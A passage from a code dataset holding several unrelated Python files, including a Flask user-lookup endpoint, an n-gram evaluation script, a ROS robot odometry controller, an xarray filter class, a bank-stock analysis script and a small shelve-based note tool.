get_user_id(email):\n user = r.table('users').filter(r.row['email'] == email).run(g.rdb_conn)\n return user.items[0].get('id')\n\n\ndef request_verification(data):\n \"\"\"Checks for field email and whether there is a user in the database\"\"\"\n if 'email' in data:\n if user_exists(data['email']):\n return get_user_id(data['email'])\n else:\n return 401\n else:\n return 400\n\n\nif __name__ == '__main__':\n application.run(debug=True)\n # TODO add logging to a file\n # TODO remove 200, 500\n","sub_path":"api/api_app.py","file_name":"api_app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244919743","text":"\"\"\"Script to extract evaluation instances for recommendation.\n\nThe evaluation instances are taken from the test sequences.\n\nEach instance is an group of ngrams that:\n * share the same prefix. The size of the prefix varies from 2 to n-1.\n * occurs in more than min_freq sequences\n\nThe output of the script, if output_filename is provided, is a pickled dict\nmapping from each prefix to the suffixes and instances where they occur.\n\n{\n prefix [tuple]: {\n suffix [tuple]: (\n instances [list of numpy_arrays]\n labels [list of ints]\n )\n }\n}\n\"\"\"\nimport numpy\nimport argparse\nimport sys\n\nsys.path.append('./')\n\nfrom collections import defaultdict\nfrom quick_experiment import utils\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_filename', type=str,\n help='The path to the pickled file with the processed'\n 'sequences.')\n parser.add_argument('--output_filename', type=str, default=None,\n help='The path to the file to store the evaluation '\n 'instances')\n parser.add_argument('--explore', action='store_true',\n help='Explore different combinations and print obtained'\n 'sizes.')\n parser.add_argument('--N', type=int, default=3,\n help='The size of the ngrams.')\n parser.add_argument('--min_freq', type=int, default=5,\n help='The minimum frequency for an instance.')\n\n return parser.parse_args()\n\n\ndef get_ngram_positions(N, sequences):\n ngram_positions = defaultdict(dict)\n for index, sequence in enumerate(sequences):\n for i in range(len(sequence) - N + 1):\n ngram = tuple(sequence[i: i + N][:, 0].tolist())\n ngram_positions[ngram][index] = i\n return ngram_positions\n\n\ndef get_evaluation_ngrams(MIN_FREQ, ngram_positions, suffix_size=1):\n evaluation_ngrams = defaultdict(list)\n for ngram, indices in ngram_positions.items():\n if len(indices) < MIN_FREQ:\n continue\n evaluation_ngrams[ngram[:-suffix_size]].append(ngram[-suffix_size:])\n filtered_evaluation = {prefix: suffixes\n for prefix, suffixes in evaluation_ngrams.items()\n if len(suffixes) >= 2}\n return filtered_evaluation\n\n\ndef get_instances(filtered_ngrams, labels, ngram_positions, sequences):\n evaluation_instances = defaultdict(dict)\n for prefix, sufixes in filtered_ngrams.items():\n for sufix in sufixes:\n ngram = prefix + sufix\n # https://stackoverflow.com/questions/835092/\n # python-dictionary-are-keys-and-values-always-the-same-order\n lengths = [x for x in ngram_positions[ngram].values()]\n instances = []\n instances_labels = []\n for index, length in ngram_positions[ngram].items():\n instance = sequences[index][:length + len(prefix)]\n assert numpy.array_equal(instance[-len(prefix):, 0], prefix)\n instances.append(instance)\n instances_labels.append(labels[index])\n evaluation_instances[prefix][sufix] = (instances, instances_labels)\n assert len(instances) == len(instances_labels)\n return evaluation_instances\n\n\ndef get_suffixes(N, labels, min_freq, sequences):\n sufixes_dict = {}\n for suffix_size in range(1, N - 1):\n ngram_positions = get_ngram_positions(N, sequences)\n filtered_ngrams = get_evaluation_ngrams(\n min_freq, ngram_positions, suffix_size)\n\n evaluation_instances = get_instances(filtered_ngrams, labels,\n ngram_positions, sequences)\n print('min_freq {} / N {} / suffix_size {}'.format(\n min_freq, N, suffix_size))\n print('Prefixes found: {}'.format(len(evaluation_instances)))\n print('Total instances found: {}'.format(sum(\n [len(instances[0])\n for suffixes_dict in evaluation_instances.values()\n for instances in suffixes_dict.values()]\n )))\n sufixes_dict[suffix_size] = evaluation_instances\n return sufixes_dict\n\n\ndef get_possible_ngrams(sequences, min_n, max_n):\n all_ngrams = {}\n for size in range(min_n, max_n + 1):\n ngrams = get_ngram_positions(size, sequences)\n all_ngrams[size] = [ngram for ngram, occurrences in ngrams.items()\n if len(occurrences) >= 5]\n print('Suffixes with size {}: {}'.format(size, len(all_ngrams[size])))\n return all_ngrams\n\n\ndef get_max_id(sequences):\n return numpy.max([instance[:,0].max(axis=0) for instance in sequences],\n axis=0)\n\n\ndef main():\n args = parse_arguments()\n raw_sequences = utils.pickle_from_file(args.input_filename)\n test_sequences = raw_sequences[1]\n test_labels = raw_sequences[3]\n\n if args.explore:\n for min_freq in [3, 5, 10]:\n for N in range(3, 6):\n get_suffixes(\n N, test_labels, min_freq, test_sequences)\n else:\n train_sequences = raw_sequences[0]\n possible_suffixes = get_possible_ngrams(train_sequences, 1, args.N - 2)\n max_id = get_max_id(\n numpy.concatenate([train_sequences, test_sequences]))\n evaluation_instances = get_suffixes(\n args.N, test_labels, args.min_freq, test_sequences)\n if args.output_filename is not None:\n utils.pickle_to_file(\n [possible_suffixes, evaluation_instances, max_id],\n args.output_filename)\n print('All operations completed')\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"preprocess/get_evaluation_instances.py","file_name":"get_evaluation_instances.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"368038076","text":"# coding: utf8\r\n__author__ = 'Lev'\r\nimport requests\r\nimport json\r\nimport re\r\nfrom datetime import datetime\r\n\r\nfrom domain.user import User\r\nfrom settings import VK_SEARCHING_TOKEN\r\nfrom util import log\r\nfrom resources import GENDERS\r\n\r\n\r\ngender_dict_vk = {0: GENDERS['undef'], 1: GENDERS['F'], 2: GENDERS['M']}\r\ndate_pattern = '\\d+\\.\\d+\\.\\d+'\r\n\r\n\r\ndef get_user_info(user_id, r_date):\r\n log('getting info for {}'.format(user_id))\r\n method_url = 'https://api.vk.com/method/users.get?'\r\n params = dict(access_token=VK_SEARCHING_TOKEN, user_ids=user_id, fields='bdate,sex')\r\n response = requests.get(method_url, params=params)\r\n result = json.loads(response.text)\r\n if 'error' in result:\r\n error = 'searching error({}): {}'.format(result['error']['error_code'], result['error']['error_msg'])\r\n raise Exception(error)\r\n result = result['response'][0]\r\n name = result['first_name'] + ' ' + result['last_name']\r\n b_date = None\r\n if 'bdate' in result and re.match(date_pattern, result['bdate']) is not None:\r\n b_date = datetime.strptime(result['bdate'], '%d.%m.%Y').date()\r\n gender = gender_dict_vk[result['sex']] if 'gender' in result else GENDERS['undef']\r\n return User(user_id, name, b_date, gender, r_date)\r\n","sub_path":"vk_api/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"453517477","text":"#!/usr/bin/env python\nimport rospy\nimport nav_msgs.msg\nimport math\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.msg import ModelStates\nfrom nav_msgs.msg import Odometry\n\nimport plotly.graph_objects as go\nimport pandas as pd\nimport numpy as np\n\nimport time\nimport datetime\n\n\ndef quaternion_to_euler(x,y,z,w) :\n\n\tt0 = 2*(w*x+y*z)\n\tt1 = 1-2*(x*x+y*y)\n\tX = math.degrees(math.atan2(t0,t1))\n\n\tt2 = 2*(w*y-z*x)\n\tt2 = +1.0 if t2 > +1.0 else t2\n\tt2 = -1.0 if t2 < -1.0 else t2\n\tY = math.degrees(math.asin(t2))\n\n\tt3 = 2*(w*z+x*y)\n\tt4 = 1-2*(y*y+z*z)\n\tZ = math.degrees(math.atan2(t3, t4))\n\n\t# X=roll Y=pitch Z=yaw\n\tX = math.atan2(t0, t1)\n\tY = math.asin(t2)\n\tZ = math.atan2(t3,t4)\n\n\treturn X, Y, Z\n\n# Used for selecting next goal\ngoal_index = 0\n\n# Some inspiration found here: https://github.com/SMARTlab-Purdue/ros-tutorial-gazebo-simulation/blob/master/gazebo-tutorial/scripts/nre_simhuskycontrol.py\ndef husky_odo_callback(data, args):\n\t\n\tpub, cmd_msg, goals = args\n\n\tglobal goal_index\n\n\tcurrent_goal = goals[goal_index]\n\t\n\t# Controller coefficients\n\tkp = 0.3\n\tka = 1.5\n\tkb = -0.001\n\n\t# Get x and y from gazebo\n\tx = data.pose.pose.position.x\n\ty = data.pose.pose.position.y\n\n\t#print(data.twist.twist)\n\n\tpos_quat = data.pose.pose.orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\t# Distance to goal\n\tro = math.sqrt((current_goal[0]-x)**2+(current_goal[1]-y)**2)\n\t\n\t# Angle between axis of the robots reference frame and the vector connecting the center of\n\t# the axle of the wheels with the final position\n\talpha = -theta + math.atan2((current_goal[1]-y), (current_goal[0]-x))\n\t\n\t# Comment about beta\n\tbeta = -theta-alpha\n\n\t#Velocity and anglular xx\n\tv = kp*ro\n\tw = ka*alpha+kb*beta\n\n\t# publish new speed and angle\n\tcmd_msg.linear.x = v\n\tcmd_msg.angular.z = w\n\n\tpub.publish(cmd_msg)\n\n\t#print(ro, current_goal)\n\t\n\t# Make robot go to the four corner coordinates\n\tif ro < 0.5:\n\t\tprint(\"Setting new goal coordinates\")\n\t\tgoal_index = goal_index + 1\n\t\t\n\t\tif goal_index == len(goals):\n\t\t\tgoal_index = 0\n\n\t\t\tmake_traj_plot(trajectory_model, trajectory_odo)\n\t\t\tmake_dist_plot(distance_traveled_model, distance_traveled_odo)\n\t\t\tmake_yaw_plot(yaw_model, yaw_odo)\n\t\t\t\n\t\t\tcurrent_goal = goals[goal_index]\n\t\t\trospy.signal_shutdown(\"Plot has been made. Shutting down...\")\n\n\ndef make_traj_plot(model, odo):\n\n\tprint(\"Printing figure\")\n\ttraj_m_df = pd.DataFrame(model, columns=['x_model', 'y_model'])\n\ttraj_o_df = pd.DataFrame(odo, columns=['x_odo','y_odo'])\n\n\n\t# Check to see if dataframes have same length\n\tif len(traj_m_df) != len(traj_o_df):\n\t\tif len(traj_m_df) > len(traj_o_df):\n\t\t\ttraj_m_df.drop(traj_m_df.tail(1).index,inplace=True)\n\t\t\t\n\t\telif len(traj_m_df) < len(traj_o_df):\n\t\t\ttraj_o_df.drop(traj_o_df.tail(1).index,inplace=True)\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=traj_m_df['x_model'],\n\t\ty=traj_m_df['y_model'],\n\t\tname=\"/gazebo/model_states\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=traj_o_df['x_odo'],\n\t\ty=traj_o_df['y_odo'],\n\t\tname=\"/odometry/filtered\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"Odometry vs ground-truth position\",\n\t\txaxis_title=\"X-coordinates\",\n\t\tyaxis_title=\"Y-coordinates\"\n\t\t)\n\n\tfig1.show()\n\ndef make_dist_plot(dist_model, dist_odo):\n\t\n\tprint(\"Printing figure\")\n\tdist_odo_df = pd.DataFrame(dist_odo, columns=['distance', 'time'])\n\tdist_model_df = pd.DataFrame(dist_model, columns=['distance', 'time'])\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=dist_model_df['time'],\n\t\ty=dist_model_df['distance'],\n\t\tname=\"Distance traveled(ground-truth)\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=dist_odo_df['time'],\n\t\ty=dist_odo_df['distance'],\n\t\tname=\"Distance traveled(odometry)\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"Distance traveled over time\",\n\t\txaxis_title=\"Time\",\n\t\tyaxis_title=\"Distance\"\n\t\t)\n\n\tfig1.show()\n\ndef make_yaw_plot(yaw_m, yaw_o):\n\t\n\tprint(\"Printing figure\")\n\tyaw_odo_df = pd.DataFrame(yaw_o, columns=['yaw', 'time'])\n\tyaw_model_df = pd.DataFrame(yaw_m, columns=['yaw', 'time'])\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=yaw_model_df['time'],\n\t\ty=yaw_model_df['yaw'],\n\t\tname=\"yaw(ground-truth)\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=yaw_odo_df['time'],\n\t\ty=yaw_odo_df['yaw'],\n\t\tname=\"yaw(odometry)\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"yaw over time\",\n\t\txaxis_title=\"Time\",\n\t\tyaxis_title=\"yaw\"\n\t\t)\n\n\tfig1.show()\n\n\nyaw_odo = []\ndistance_traveled_odo =[]\ntrajectory_odo = []\ndef odometry_callback(data, args):\n\n\tt0, t_total_o = args\n\tglobal trajectory_odo\n\tglobal distance_traveled_odo\n\tglobal yaw_odo\n\n\tt1 = datetime.datetime.now()\n\tduration = t1 - t0\n\ttime = float(duration.total_seconds())\n\n\tx = data.pose.pose.position.x\n\ty = data.pose.pose.position.y\n\n\tpos_quat = data.pose.pose.orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\n\tnew_pos = [x,y]\n\n\tif len(trajectory_odo) != 0: \n\t\tif len(distance_traveled_odo) == 0 and len(yaw_odo) == 0:\n\t\t\tdistance_traveled_odo.append([0,0])\n\t\t\tyaw_odo.append([0,0])\n\n\t\tdist = get_euclidean_dist(trajectory_odo[-1], new_pos)\n\t\tnew_dist = distance_traveled_odo[-1][0] + dist\n\n\t\tdistance_traveled_odo.append([new_dist, time])\n\t\tyaw_odo.append([theta, time])\n\n\t\tprint(distance_traveled_odo[-1])\n\n\ttrajectory_odo.append([x,y])\n\tt_total_o.append(time)\n\n\ndef get_euclidean_dist(cords1, cords2):\n\treturn math.sqrt(math.pow(cords1[0]-cords2[0],2)+(math.pow(cords1[1]-cords2[1],2)))\n\nyaw_model = []\ndistance_traveled_model = []\ntrajectory_model = []\ndef model_state_callback(data, args):\n\n\tt0, t_total_m = args\n\tglobal trajectory_model\n\tglobal distance_traveled_model\n\tglobal yaw_model\n\n\tt1 = datetime.datetime.now()\n\tduration = t1 - t0\n\ttime = float(duration.total_seconds())\n\n\tx = data.pose[2].position.x\n\ty = data.pose[2].position.y\n\n\tpos_quat = data.pose[2].orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\n\tnew_pos = [x,y]\n\n\tif len(trajectory_model) != 0: \n\t\tif len(distance_traveled_model) == 0 and len(yaw_model) == 0:\n\t\t\tdistance_traveled_model.append([0,0])\n\t\t\tyaw_model.append([0,0])\n\n\t\tdist = get_euclidean_dist(trajectory_model[-1], new_pos)\n\t\tnew_dist = distance_traveled_model[-1][0] + dist\n\n\t\tdistance_traveled_model.append([new_dist, time])\n\t\tyaw_model.append([theta, time])\n\n\t\tprint(distance_traveled_model[-1])\n\n\ttrajectory_model.append([x,y])\n\tt_total_m.append(time)\n\n\ndef setup():\n\tgoal_index = 0\n\n\tprint(\"Setup \")\n\n\t# The four corners of the \"maze\"\n\tgoals = [[2.8,0], [10.5,-1], [11.3,5], [5,5]]\n\tgoal_index = 0\n\n\tt0 = datetime.datetime.now()\n\tt_total_m = []\n\tt_total_o = []\n\n\t# Setup node\n\trospy.init_node(\"basic_subscriber\", anonymous=True, disable_signals=True)\n\n\t# Message used to send commands to robot\n\tcmd_msg = Twist()\n\n\t# initialize publisher\n\tpub = rospy.Publisher(\"husky_velocity_controller/cmd_vel\", Twist, queue_size=10)\n\n\t# Initialize subscriber\n\todometry_subscriber = rospy.Subscriber('/odometry/filtered', Odometry, husky_odo_callback, (pub, cmd_msg, goals))\n\n\tmodelstate_plot_subscriber = rospy.Subscriber('/gazebo/model_states', ModelStates, model_state_callback, (t0, t_total_m))\n\todometry_plot_subscriber = rospy.Subscriber('/odometry/filtered', Odometry, odometry_callback, (t0, t_total_o))\n\n\nif __name__ =='__main__':\n\ttry:\n\t\tsetup()\n\n\n\t\t# This line keeps the subscriber() function alive until a user terminates using CTRL+C.\n\t\trospy.spin()\n\n\texcept rospy.ROSInterruptException:\n\t\tpass","sub_path":"husky_sensors/src/scripts/simple_maze_odometry.py","file_name":"simple_maze_odometry.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355794611","text":"from ..algorithm import Algorithm\nfrom abc import abstractmethod\nfrom ..utils import get_vars_for_dims, expand_variables\n\n\nclass Filter(Algorithm):\n \"\"\"\n The base class for a generic filter.\n\n Parameters\n ----------\n dims : tuple of str\n The dimensions along which the filter is applied.\n \"\"\"\n\n # If per_variable is True, the filter is applied independently for\n # each variable. Otherwise, all variables may be used to determine the\n # filter weights.\n per_variable = True\n dims = ()\n\n @abstractmethod\n def __init__(self, *args, **kwargs):\n return\n\n def apply(self, ds, inplace=False):\n \"\"\"\n Apply the filter to the input dataset.\n\n Parameters\n ----------\n ds : xarray.Dataset\n The input dataset\n inplace : bool, optional\n If True, overwrite the input data inplace (default: False).\n\n Returns\n -------\n xarray.Dataset\n The filtered dataset\n \"\"\"\n if inplace:\n raise NotImplementedError('Inplace filtering is not currently '\n 'implemented.')\n\n # This is not in the correct order, as ds.dims is always sorted\n # alphabetically.\n orig_dims = tuple(ds.dims)\n ordered_dims = self.dims + tuple(set(orig_dims) - set(self.dims))\n\n # Find all variables that match the given dimensions\n variables = get_vars_for_dims(ds, self.dims)\n other_variables = get_vars_for_dims(ds, self.dims, invert=True)\n\n #\n # Apply the actual filter\n #\n if self.per_variable:\n # Apply independently for each variable.\n result = ds.copy(deep=True)\n for v in variables:\n vdims = result[v].dims\n axes = tuple([vdims.index(d) for d in self.dims])\n # Prepare data and output as numpy arrays\n self._filter(ds[v].values, axes,\n output=result[v].values)\n\n else:\n # The variables are an additional dimension.\n ordered_dims = ordered_dims + ('variable',)\n\n # convert to DataArray\n da_ordered = ds[variables].to_array().transpose(*ordered_dims)\n da_filtered = da_ordered.copy()\n axes = tuple([da_ordered.dims.index(d) for d in self.dims])\n\n # Prepare data and output as numpy arrays\n self._filter(da_ordered.values, axes, output=da_filtered.values)\n\n # Reassemble Dataset\n result = expand_variables(da_filtered)\n # Make sure all variable dimensions are in the original order\n for v in result.data_vars:\n result[v] = result[v].transpose(*ds[v].dims)\n\n for v in other_variables:\n result[v] = ds[v]\n\n return result\n\n @abstractmethod\n def _filter(self, arr, axes, output=None):\n \"\"\"\n This method must be implemented by all derived classes.\n \"\"\"\n return\n","sub_path":"nd/filters/filter_.py","file_name":"filter_.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"236431179","text":"\nfrom tkinter import *\nfrom app.enum.outpins import OutPin\nfrom app.gui import OFF_COLOR, ON_COLOR\n\nDEFAULT_FONT = (\"Arial\", 40)\n\nclass Checklist(Frame):\n def __init__(self, parent, st):\n super().__init__(parent, borderwidth=2, relief=SUNKEN)\n \n self.start = st\n \n self.tempitem = Label(self, text=\"Temperature Set\", font=DEFAULT_FONT, bg=OFF_COLOR)\n self.nipitem = Label(self, text=\"Nip Closed\",font=DEFAULT_FONT, bg=OFF_COLOR)\n self.brakeitem = Label(self, text=\"Brake Disengaged\",font=DEFAULT_FONT, bg=ON_COLOR)\n self.clutchitem = Label(self, text=\"Clutch Engaged\",font=DEFAULT_FONT, bg=OFF_COLOR)\n self.vacitem = Label(self, text=\"Vac/Air On\", font=DEFAULT_FONT, bg=OFF_COLOR)\n \n self.simple = {OutPin.ChainClutch: self.clutchitem,\n OutPin.UnwindBrake: self.brakeitem,\n OutPin.NipsSolenoid: self.nipitem,\n OutPin.VacAir: self.vacitem}\n self.tempitem.val = False\n self.tempitem.pack(fill=X)\n self.nipitem.val = False\n self.nipitem.pack(fill=X)\n self.brakeitem.val = True\n self.brakeitem.pack(fill=X)\n self.clutchitem.val = False\n self.clutchitem.pack(fill=X)\n self.vacitem.val = False\n self.vacitem.pack(fill=X)\n\n def check_start(self):\n if self.tempitem.val and self.nipitem.val and self.brakeitem.val and self.clutchitem.val and self.vacitem.val:\n self.start.unlock()\n else:\n self.start.lock()\n \n def set_good(self, item):\n item['bg'] = ON_COLOR\n item.val = True\n\n def set_bad(self, item):\n item['bg'] = OFF_COLOR\n item.val = False\n\n def set_temp(self, temp, in_zone):\n if in_zone:\n self.set_good(self.tempitem)\n else:\n self.set_bad(self.tempitem)\n self.check_start()\n\n def onclick(self, pin, val):\n if pin is OutPin.UnwindBrake:\n val = not val\n\n if val:\n self.set_good(self.simple[pin])\n else:\n self.set_bad(self.simple[pin])\n self.check_start()\n","sub_path":"app/gui/checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"517005746","text":"__author__ = 'Atanassov'\n\nfrom sklearn.datasets import fetch_20newsgroups\nimport re\n\nif __name__ == '__main__':\n\n newsgroups_train = fetch_20newsgroups(subset='train', remove=('headers', 'footers', 'quotes'))\n newsgroups_test = fetch_20newsgroups(subset='test', remove=('headers', 'footers', 'quotes'))\n\n for i in range(len(newsgroups_train.filenames)):\n data = newsgroups_train.data[i].replace('\\x92', '\\'')\n if re.search('[a-zA-Z]', data) != None:\n filename = '..\\\\raw-in\\\\' + newsgroups_train.filenames[i][49:].replace('\\\\', '_') + '.txt'\n handle = open(filename, 'w')\n handle.write(data)\n handle.close()\n\n for i in range(len(newsgroups_test.filenames)):\n data = newsgroups_test.data[i].replace('\\x92', '\\'')\n if re.search('[a-zA-Z]', data) != None:\n filename = '..\\\\raw-in\\\\' + newsgroups_test.filenames[i][49:].replace('\\\\', '_') + '.txt'\n handle = open(filename, 'w')\n handle.write(data)\n handle.close()\n\n","sub_path":"obc_20k.py","file_name":"obc_20k.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432286008","text":"'''\r\nimport various libraries to be\r\nused in this project\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport pandas_datareader as dr\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n'''\r\nreading bank stocks data off the internet\r\nfor various banks.\r\nthe datareader method identifies the bank name from its ticker. unfortunately google is not \r\navailable for some reason. set the start and end as a datetime object\r\n'''\r\n\r\nbac = dr.data.DataReader('BAC', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nc = dr.data.DataReader('C', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\n# sbin = dr.data.DataReader('SBIN',data_source='yahoo',start=dt.datetime(2006,1,1),end=dt.datetime(2016,1,1))\r\ngs = dr.data.DataReader('GS', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\njpm = dr.data.DataReader('JPM', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nms = dr.data.DataReader('MS', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nwfc = dr.data.DataReader('WFC', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\n\r\n'''\r\ncreating a list object ticker and storing a list of all the tickers of the bank\r\nin alphabetical order \r\n'''\r\ntickers = ('BAC C GS MS JPM WFC'.split())\r\ntickers.sort()\r\nprint(tickers)\r\n\r\n# create a new dataframe merging all the data of the banks\r\nbank_stocks = pd.concat([bac, c, gs, jpm, ms, wfc], axis=1, keys=tickers)\r\n\r\n# printing the head of the bank stocks dataframe\r\nprint(bank_stocks.head())\r\n\r\n# naming the two levels of columns\r\nbank_stocks.columns.names = ['Bank Ticker', 'Stock Info']\r\n\r\n# print the dataframe head again with new column indices\r\nprint(bank_stocks.head(2))\r\n\r\n'''\r\nusing the cross section .xs function to\r\nprint the highest single day closing value of various banks\r\n'''\r\nprint(bank_stocks.xs(key='Close', axis=1, level='Stock Info').max())\r\n\r\n'''\r\ncreating a new dataframe returns and storing the percentage change values of \r\nof closing values of all the bAnks\r\nprinting the head of the returns dataframe\r\n'''\r\nreturns = pd.DataFrame()\r\nfor ticks in tickers:\r\n returns[ticks + ' return'] = bank_stocks[ticks]['Close'].pct_change()\r\n\r\nprint(returns.head(5))\r\n# dropping NaN values\r\nreturns.dropna(inplace=True)\r\n\r\n'''\r\nsetting the seaborn plot style for all \r\nplots and draawing a pairplot for the returns value of each bank against ALL other banks\r\n'''\r\nsns.set_style('whitegrid')\r\nsns.pairplot(data=returns, kind='reg', diag_kind='kde', )\r\nplt.show()\r\n\r\n'''\r\nthis part of the code is faulty.\r\nIt is supposed to print the dataframe containing the date of worst and best single day return \r\nof each bank.\r\nI have done this instead using the idxmax() and idx min finction\r\nthe faulty code is as follows\r\n------------------------------------------------------------------------------------------------------\r\nret_max=pd.Series()\r\nret_min=pd.Series()\r\ndef check_ret_max():\r\n for p in tickers:\r\n ret_max.append(returns[p+' return'].argmax())\r\n return ret_max()\r\ndef check_ret_min():\r\n for p in tickers:\r\n ret_min.append(returns[p+' return'].argmin())\r\n return ret_min()\r\n\r\ncheck_ret_min()\r\ncheck_ret_max()\r\n\r\nprint (ret_max)\r\nprint (ret_min)\r\n------------------------------------------------------------------------------------------------------\r\n'''\r\nprint(returns.idxmin())\r\nprint(returns.idxmax())\r\n\r\n#prints the standard deviation of the returns of all the banks\r\nprint('STANDARD DEVIATION OF THE BANKS IS:')\r\nprint(returns.apply(np.std))\r\n\r\n\r\n'''\r\ncreating a distplot of returns of year 2015 of morgan stanley stocks \r\n'''\r\nsns.distplot(returns.loc[dt.datetime(2015,1,1):dt.datetime(2015,12,31)]['MS return'],bins=100,color='green',kde=True)\r\nplt.show()\r\n\r\n'''\r\ncreatng the distplot of citibank return of year 2008\r\n'''\r\nsns.distplot(returns.loc[dt.datetime(2008,1,1):dt.datetime(2008,12,31)]['C return'],bins=100,color='red')\r\nplt.show()\r\n\r\n'''\r\ncreating a line plot of all the banks' closing value\r\n'''\r\nbank_stocks.xs(key='Close',level=1,axis=1).plot(figsize=(16,9),label=ticks)\r\nplt.legend()\r\nplt.show()\r\n\r\n'''\r\nheatmap of correlation of closing values of all banks\r\n'''\r\nsns.heatmap(bank_stocks.xs(key='Close',level=1,axis=1).corr(),cmap='magma',annot=True)\r\nplt.show()\r\n'''\r\nclustermap of correlation of closing values of all banks\r\n'''\r\n\r\nsns.clustermap(bank_stocks.xs(key='Close',level=1,axis=1).corr(),cmap='magma',annot=True)\r\nplt.show()\r\nplt.tight_layout()","sub_path":"DataCapstone/FinanceProject.py","file_name":"FinanceProject.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"636054465","text":"#!/usr/bin/python\n\n'''\na simple script for managing information\n'''\n\nimport shelve\nfrom functools import reduce\nimport sys\nimport os\n\nclass Info:\n '''\n a piece of information, contains `name`, `text`(optional) and `date`(optional)\n '''\n def __init__(self, name, text=None, date=None):\n self.name, self.text, self.date = name, text, date\n\n def __str__(self):\n head = (self.date + ' | ') if self.date else ''\n body = self.name\n back = (' : ' + self.text) if self.text else ''\n\n return head + body + back\n\ndef parse_args(argv, shv):\n\n if len(argv) == 0:\n return ('', '')\n \n assert(len(argv) == 2), f'invalid nuber of arguments : {argv}'\n\n argv = [i.lower() for i in argv]\n\n if argv[0] == 'add':\n pass\n elif argv[0] == 'del':\n assert(argv[1] in shv), f'{argv[1]} does not exist'\n elif argv[0] == 'help':\n pass\n else:\n raise AssertionError(f'invalid argument : {argv[0]}')\n\n return argv\n \ndef parse_contents(txt):\n\n name, text, date = None, None, None\n \n rest = txt.split('|')\n \n if len(rest) == 1:\n rest = rest[0]\n else:\n date = rest[0]\n rest = rest[1]\n\n rest = rest.split(':')\n\n if len(rest) == 1:\n name = rest[0]\n else:\n text = rest[1]\n name = rest[0]\n\n #print('name:',name,'text:',text,'date',date)\n\n return (name, text, date)\n\ndef main():\n shv_root = os.path.join(os.environ['HOME'], '.config/self-info/')\n\n if not os.path.exists(shv_root):\n os.makedirs(shv_root)\n\n with shelve.open(os.path.join(shv_root, 'shv')) as shv:\n option, item = parse_args(sys.argv[1:], shv)\n \n if option == 'add':\n name, text, date = parse_contents(item)\n\n shv[name] = Info(name, text, date)\n elif option == 'del':\n print(f'removed item : {shv.pop(item)}')\n else:\n [print(shv[i]) for i in shv]\n\nif __name__ == '__main__':\n main()\n","sub_path":"self-info.py","file_name":"self-info.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"36359978","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3\nfrom typing import Tuple\n\nfrom classis.utils import is_valid_name\n\nDATABASE_PATH = \"db/database.sqlite\"\nMAIN_TABLE_NAME = \"MAIN_LIST\"\n\n\ndef create_connection(db_path=DATABASE_PATH):\n conn = None\n try:\n conn = sqlite3.connect(DATABASE_PATH)\n except sqlite3.Error as e:\n print(e)\n return conn\n\n\ndef database_cursor(func):\n def wrapper(*args, **kwargs):\n conn = create_connection()\n if conn is None:\n return\n cursor = conn.cursor()\n res = func(cursor, *args, **kwargs)\n\n conn.commit()\n cursor.close()\n conn.close()\n return res\n return wrapper\n\n\n@database_cursor\ndef init_database(cursor: sqlite3.Cursor):\n 